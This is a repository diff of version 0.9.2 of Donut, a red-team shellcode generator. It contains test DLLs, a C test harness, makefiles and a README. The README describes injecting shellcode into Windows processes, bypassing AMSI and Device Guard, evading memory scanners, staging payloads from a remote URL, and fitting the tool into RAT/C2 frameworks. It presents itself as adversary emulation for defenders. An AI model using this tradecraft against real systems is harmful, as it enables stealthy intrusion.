New upstream version 0.9.2
Sophie Brun
4 years ago
0 | #define UNICODE | |
1 | ||
2 | #include <stdint.h> | |
3 | #include <stdio.h> | |
4 | #include <stdlib.h> | |
5 | #include <string.h> | |
6 | #include <sys/stat.h> | |
7 | #include <inttypes.h> | |
8 | ||
9 | #include <windows.h> | |
10 | #pragma comment(lib, "user32.lib") | |
11 | #pragma comment(lib, "shell32.lib") | |
12 | ||
13 | __declspec(dllexport) | |
14 | VOID WINAPI RunProcess(PWCHAR proc1, PWCHAR proc2) { | |
15 | PROCESS_INFORMATION pi; | |
16 | STARTUPINFO si; | |
17 | ||
18 | ZeroMemory(&si, sizeof(si)); | |
19 | si.cb = sizeof(si); | |
20 | CreateProcess(NULL, proc1, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi); | |
21 | ||
22 | ZeroMemory(&si, sizeof(si)); | |
23 | si.cb = sizeof(si); | |
24 | CreateProcess(NULL, proc2, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi); | |
25 | } | |
26 | ||
27 | __declspec(dllexport) | |
28 | VOID WINAPI DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) { | |
29 | WCHAR msg[4096]; | |
30 | ||
31 | _snwprintf(msg, ARRAYSIZE(msg), | |
32 | L"param[0] : %ws\r" | |
33 | L"param[1] : %ws\r" | |
34 | L"param[2] : %ws\r" | |
35 | L"param[3] : %ws\r", | |
36 | arg0, arg1, arg2, arg3); | |
37 | ||
38 | MessageBox(NULL, msg, L"Donut Test", MB_OK); | |
39 | } | |
40 | ||
41 | __declspec(dllexport) | |
42 | BOOL WINAPI DllMain(HMODULE hModule, | |
43 | DWORD ul_reason_for_call, | |
44 | LPVOID lpReserved) { | |
45 | switch (ul_reason_for_call) { | |
46 | case DLL_PROCESS_ATTACH: | |
47 | MessageBox(NULL, L"Hello, World!", L"Hello, World!", 0); | |
48 | break; | |
49 | case DLL_THREAD_ATTACH: | |
50 | case DLL_THREAD_DETACH: | |
51 | case DLL_PROCESS_DETACH: | |
52 | break; | |
53 | } | |
54 | return TRUE; | |
55 | } |
0 | ||
1 | ||
2 | // just some simple test cases to use with donut library | |
3 | ||
4 | #include "donut.h" | |
5 | ||
6 | typedef struct _test_case_t { | |
7 | int arch; | |
8 | int bypass; | |
9 | int inst_type; | |
10 | char *domain; | |
11 | char *cls; | |
12 | char *method; | |
13 | char *param; | |
14 | char *file; | |
15 | char *url; | |
16 | char *runtime; | |
17 | int err; // expected result based on test case | |
18 | } test_case; | |
19 | ||
20 | test_case tests[] = { | |
21 | // nothing supplied | |
22 | {0,0,0,"","","","","","","",DONUT_ERROR_INVALID_PARAMETER}, | |
23 | // requesting x86 shellcode for x64 DLL | |
24 | {DONUT_ARCH_X86,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","cls","method","param","hello_amd64.dll","","",DONUT_ERROR_ARCH_MISMATCH}, | |
25 | // requesting x64 shellcode for x86 DLL | |
26 | {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","","","hello_x86.dll","","",DONUT_ERROR_ARCH_MISMATCH}, | |
27 | // supplying parameters for unmanaged DLL, but not function name | |
28 | {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","","calc.exe,notepad.exe","hello_amd64.dll","","",DONUT_ERROR_DLL_PARAM}, | |
29 | // supplying function name that can't be found in DLL | |
30 | {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","NoMethod","calc.exe,notepad.exe","hello_amd64.dll","","",DONUT_ERROR_DLL_FUNCTION}, | |
31 | // supplying file that isn't recognized | |
32 | {DONUT_ARCH_ANY,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"","","","","/dev/null","","",DONUT_ERROR_FILE_INVALID}, | |
33 | // .NET DLL assembly with no method provided | |
34 | {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","TestClass","","","class1.dll","","",DONUT_ERROR_NET_PARAMS}, | |
35 | // .NET DLL assembly with no class provided | |
36 | {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","RunProcess","calc.exe,notepad.exe","class1.dll","","",DONUT_ERROR_NET_PARAMS}, | |
37 | // .NET DLL with good parameters | |
38 | {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","","",DONUT_ERROR_SUCCESS}, | |
39 | // invalid URL | |
40 | {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","http:","",DONUT_ERROR_INVALID_URL}, | |
41 | // invalid URL length | |
42 | {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","http://","",DONUT_ERROR_URL_LENGTH}, | |
43 | {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","https://","",DONUT_ERROR_URL_LENGTH}, | |
44 | {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","https://a","",DONUT_ERROR_SUCCESS}, | |
45 | {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll", | |
46 | "https://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | |
47 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | |
48 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | |
49 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | |
50 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | |
51 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | |
52 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | |
53 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | |
54 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | |
55 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", | |
56 | "",DONUT_ERROR_URL_LENGTH}, | |
57 | }; | |
58 | ||
59 | int main(void) | |
60 | { | |
61 | DONUT_CONFIG c; | |
62 | int err, i; | |
63 | ||
64 | for(i=0; i<sizeof(tests)/sizeof(test_case); i++) { | |
65 | memset(&c, 0, sizeof(c)); | |
66 | ||
67 | c.arch = tests[i].arch; | |
68 | c.bypass = tests[i].bypass; | |
69 | c.inst_type = tests[i].inst_type; | |
70 | ||
71 | strncpy(c.domain , tests[i].domain, sizeof(c.domain) - 1); | |
72 | strncpy(c.cls , tests[i].cls, sizeof(c.cls) - 1); | |
73 | strncpy(c.method , tests[i].method, sizeof(c.method) - 1); | |
74 | strncpy(c.param , tests[i].param, sizeof(c.param) - 1); | |
75 | strncpy(c.file , tests[i].file, sizeof(c.file) - 1); | |
76 | strncpy(c.url , tests[i].url, sizeof(c.url) - 1); | |
77 | strncpy(c.runtime, tests[i].runtime, sizeof(c.runtime) - 1); | |
78 | ||
79 | printf("Test Case # %2i ", (i+1)); | |
80 | err = DonutCreate(&c); | |
81 | DonutDelete(&c); | |
82 | ||
83 | printf("returned %2i : %s\n", | |
84 | err, err == tests[i].err ? "OK" : "FAILED"); | |
85 | } | |
86 | return 0; | |
87 | } |
0 | BSD 3-Clause License | |
1 | ||
2 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
3 | ||
4 | Redistribution and use in source and binary forms, with or without | |
5 | modification, are permitted provided that the following conditions are met: | |
6 | ||
7 | * Redistributions of source code must retain the above copyright notice, this | |
8 | list of conditions and the following disclaimer. | |
9 | ||
10 | * Redistributions in binary form must reproduce the above copyright notice, | |
11 | this list of conditions and the following disclaimer in the documentation | |
12 | and/or other materials provided with the distribution. | |
13 | ||
14 | * Neither the name of the copyright holder nor the names of its | |
15 | contributors may be used to endorse or promote products derived from | |
16 | this software without specific prior written permission. | |
17 | ||
18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
19 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
20 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
22 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
23 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
24 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
25 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
26 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
27 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. |
0 | include README.md | |
1 | include Makefile* | |
2 | include LICENSE | |
3 | include version-release-notes.txt | |
4 | recursive-include . *.c | |
5 | recursive-include payload * | |
6 | recursive-include include * | |
7 | recursive-include docs * | |
8 | recursive-include lib *⏎ |
0 | donut: | |
1 | gcc -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut | |
2 | gcc -Wall -c -fpack-struct=8 -fPIC -I include donut.c hash.c encrypt.c payload/clib.c | |
3 | ar rcs lib/libdonut.a donut.o hash.o encrypt.o clib.o | |
4 | gcc -Wall -shared -o lib/libdonut.so donut.o hash.o encrypt.o clib.o | |
5 | debug: | |
6 | gcc -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut | |
7 | clean: | |
8 | rm *.o donut lib/libdonut.a lib/libdonut.so |
0 | donut: | |
1 | x86_64-w64-mingw32-gcc -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut.exe | |
2 | debug: | |
3 | x86_64-w64-mingw32-gcc -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut.exe | |
4 | clean: | |
5 | rm donut.exe *.o |
0 | donut: | |
1 | cl -Zp8 -nologo -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c | |
2 | cl -Zp8 -nologo -DDLL -LD -I include donut.c hash.c encrypt.c payload/clib.c | |
3 | move donut.lib lib/donut.lib | |
4 | move donut.exp lib/donut.exp | |
5 | move donut.dll lib/donut.dll | |
6 | debug: | |
7 | cl -Zp8 -nologo -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c | |
8 | cl -Zp8 -nologo -DDEBUG -DDLL -LD -I include donut.c hash.c encrypt.c payload/clib.c | |
9 | move donut.lib lib/donut.lib | |
10 | move donut.exp lib/donut.exp | |
11 | move donut.dll lib/donut.dll | |
12 | clean: | |
13 | del *.obj *.bin donut.exe lib/donut.exp lib/donut.lib lib/donut.dll |
0 | Metadata-Version: 2.1 | |
1 | Name: donut-shellcode | |
2 | Version: 0.9.2 | |
3 | Summary: Donut Python C extension | |
4 | Home-page: https://github.com/TheWover/donut | |
5 | Author: TheWover, Odzhan, byt3bl33d3r | |
6 | License: UNKNOWN | |
7 | Description: # Using Donut | |
8 | ||
9 | ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut") | |
10 | ||
11 | Version: 0.9.2 *please submit issues and requests for v1.0 release* | |
12 | ||
13 | Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/ | |
14 | ||
15 | TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/ | |
16 | ||
17 | v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/ | |
18 | ||
19 | ## Introduction | |
20 | ||
21 | Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains. | |
22 | ||
23 | It can be used in several ways. | |
24 | ||
25 | ## As a Standalone Tool | |
26 | ||
27 | Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below. | |
28 | ||
29 | ``` | |
30 | ||
31 | usage: donut [options] -f <EXE/DLL/VBS/JS/XSL> | |
32 | ||
33 | -MODULE OPTIONS- | |
34 | ||
35 | -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory. | |
36 | -u <URL> HTTP server that will host the donut module. | |
37 | ||
38 | -PIC/SHELLCODE OPTIONS- | |
39 | ||
40 | -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default). | |
41 | -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default) | |
42 | -o <payload> Output file. Default is "payload.bin" | |
43 | ||
44 | -DOTNET OPTIONS- | |
45 | ||
46 | -c <namespace.class> Optional class name. (required for .NET DLL) | |
47 | -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL) | |
48 | -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon. | |
49 | -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available. | |
50 | -d <name> AppDomain name to create for .NET. Randomly generated by default. | |
51 | ||
52 | examples: | |
53 | ||
54 | donut -f c2.dll | |
55 | donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll | |
56 | donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/ | |
57 | ||
58 | ``` | |
59 | ||
60 | ### Building Donut | |
61 | ||
62 | Tags have been provided for each release version of donut that contain the compiled executables. | |
63 | ||
64 | * v0.9.2, Bear Claw: | |
65 | * v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2 | |
66 | * v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1 | |
67 | * v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9 | |
68 | ||
69 | However, you may also clone and build the source yourself using the provided makefiles. | |
70 | ||
71 | ## Building From Repository | |
72 | ||
73 | From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory. | |
74 | ||
75 | ``` | |
76 | git clone http://github.com/thewover/donut | |
77 | cd donut | |
78 | ``` | |
79 | ||
80 | ## Linux | |
81 | ||
82 | Simply run make to generate an executable, static and dynamic libraries. | |
83 | ||
84 | ``` | |
85 | make | |
86 | make clean | |
87 | make debug | |
88 | ``` | |
89 | ||
90 | ## Windows | |
91 | ||
92 | Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut: | |
93 | ||
94 | ``` | |
95 | nmake -f Makefile.msvc | |
96 | nmake clean -f Makefile.msvc | |
97 | nmake debug -f Makefile.msvc | |
98 | ``` | |
99 | ||
100 | ## As a Library | |
101 | ||
102 | donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` . | |
103 | ||
104 | ## As a Python Module | |
105 | ||
106 | Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3. | |
107 | ||
108 | ``` | |
109 | pip install . | |
110 | ``` | |
111 | ||
112 | Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory. | |
113 | ||
114 | ``` | |
115 | pip install donut-shellcode | |
116 | ``` | |
117 | ||
118 | ## As a Template - Rebuilding the shellcode | |
119 | ||
120 | *payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut. | |
121 | ||
122 | ### Microsoft Visual Studio | |
123 | ||
124 | **Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.** | |
125 | ||
126 | Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following: | |
127 | ||
128 | ``` | |
129 | nmake clean -f Makefile.msvc | |
130 | nmake -f Makefile.msvc | |
131 | ``` | |
132 | ||
133 | This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates. | |
134 | ||
135 | To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following: | |
136 | ||
137 | ``` | |
138 | nmake clean -f Makefile.msvc | |
139 | nmake x86 -f Makefile.msvc | |
140 | ``` | |
141 | ||
142 | This will save the shellcode as a C array to *payload_exe_x86.h*. | |
143 | ||
144 | ### Mingw-w64 | |
145 | ||
146 | Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following: | |
147 | ||
148 | ``` | |
149 | make clean -f Makefile.mingw | |
150 | make -f Makefile.mingw | |
151 | ``` | |
152 | ||
153 | Once you've recompiled for all architectures, you may rebuild donut. | |
154 | ||
155 | ## Bypasses | |
156 | ||
157 | Donut includes a bypass system for AMSI and other security features. Currently we bypass: | |
158 | ||
159 | * AMSI in .NET v4.8 | |
160 | * Device Guard policy preventing dynamicly generated code from executing | |
161 | ||
162 | You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c. | |
163 | ||
164 | Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used. | |
165 | ||
166 | Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using. | |
167 | ||
168 | Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined. | |
169 | ||
170 | If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded. | |
171 | ||
172 | Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research. | |
173 | ||
174 | ### Additional features. | |
175 | ||
176 | These are left as exercises to the reader. I would personally recommend: | |
177 | ||
178 | * Add environmental keying | |
179 | * Make donut polymorphic by obfuscating *payload* every time shellcode is generated | |
180 | * Integrate donut as a module into your favorite RAT/C2 Framework | |
181 | ||
182 | ## Disclaimers | |
183 | ||
184 | * No, we will not update donut to counter signatures or detections by any AV. | |
185 | * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct. | |
186 | ||
187 | # How it works | |
188 | ||
189 | ## Procedure for Assemblies | |
190 | ||
191 | Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters. | |
192 | ||
193 | The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters). | |
194 | ||
195 | Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces | |
196 | ||
197 | For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader | |
198 | ||
199 | Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README. | |
200 | ||
201 | ## Procedure for ActiveScript/XSL | |
202 | ||
203 | The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/). | |
204 | ||
205 | ## Procedure for PE Loading | |
206 | ||
207 | The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/). | |
208 | ||
209 | ## Components | |
210 | ||
211 | Donut contains the following elements: | |
212 | ||
213 | * donut.c: The source code for the donut payload generator | |
214 | * donut.exe: The compiled payload generator as an EXE | |
215 | * donut.py: The donut payload generator as a Python script *(planned for version 1.0)* | |
216 | * donutmodule.c: The CPython wrapper for Donut. Used by the Python module. | |
217 | * setup.py: The setup file for installing Donut as a Pip Python3 module. | |
218 | * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform | |
219 | * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform | |
220 | * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project | |
221 | * payload/payload.c: Main file for the shellcode. | |
222 | * payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies. | |
223 | * payload/inmem_pe.c: In-Memory loader for EXE/DLL files. | |
224 | * payload/inmem_xml.c: In-Memory loader for XSL/XML files. | |
225 | * payload/inmem_script.c: In-Memory loader for VBScript/JScript files. | |
226 | * payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files. | |
227 | * payload/wscript.c: Supports a number of WScript methods that cscript/wscript support. | |
228 | * payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP) | |
229 | * payload/http_client.c: Downloads a module from remote staging server into memory. | |
230 | * payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB). | |
231 | * payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset. | |
232 | * payload/inject.exe: The compiled C shellcode injector | |
233 | * payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing. | |
234 | * payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible | |
235 | * payload/runsc.exe: The compiled C shellcode runner | |
236 | * payload/exe2h/exe2h.c: Source code for exe2h | |
237 | * payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file | |
238 | * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption. | |
239 | * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing. | |
240 | ||
241 | # Subprojects | |
242 | ||
243 | There are three companion projects provided with donut: | |
244 | ||
245 | * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute. | |
246 | * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string. | |
247 | * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly. | |
248 | * ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded. | |
249 | ||
250 | # Project plan | |
251 | ||
252 | * ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~ | |
253 | * Create a C# version of the generator. | |
254 | * Create a donut.py generator that uses the same command-line parameters as donut.exe. | |
255 | * Add support for HTTP proxies. | |
256 | ~~* Find ways to simplify the shellcode if possible.~~ | |
257 | * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it. | |
258 | * ~~Dynamic Calls to DLL functions.~~ | |
259 | * Handle the ProcessExit event from AppDomain using unmanaged code. | |
260 | ||
261 | Platform: UNKNOWN | |
262 | Requires-Python: >=3.0 | |
263 | Description-Content-Type: text/markdown |
0 | # Using Donut | |
1 | ||
2 | ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut") | |
3 | ||
4 | Version: 0.9.2 *please submit issues and requests for v1.0 release* | |
5 | ||
6 | Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/ | |
7 | ||
8 | TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/ | |
9 | ||
10 | v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/ | |
11 | ||
12 | ## Introduction | |
13 | ||
14 | Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains. | |
15 | ||
16 | It can be used in several ways. | |
17 | ||
18 | ## As a Standalone Tool | |
19 | ||
20 | Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below. | |
21 | ||
22 | ``` | |
23 | ||
24 | usage: donut [options] -f <EXE/DLL/VBS/JS/XSL> | |
25 | ||
26 | -MODULE OPTIONS- | |
27 | ||
28 | -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory. | |
29 | -u <URL> HTTP server that will host the donut module. | |
30 | ||
31 | -PIC/SHELLCODE OPTIONS- | |
32 | ||
33 | -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default). | |
34 | -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default) | |
35 | -o <payload> Output file. Default is "payload.bin" | |
36 | ||
37 | -DOTNET OPTIONS- | |
38 | ||
39 | -c <namespace.class> Optional class name. (required for .NET DLL) | |
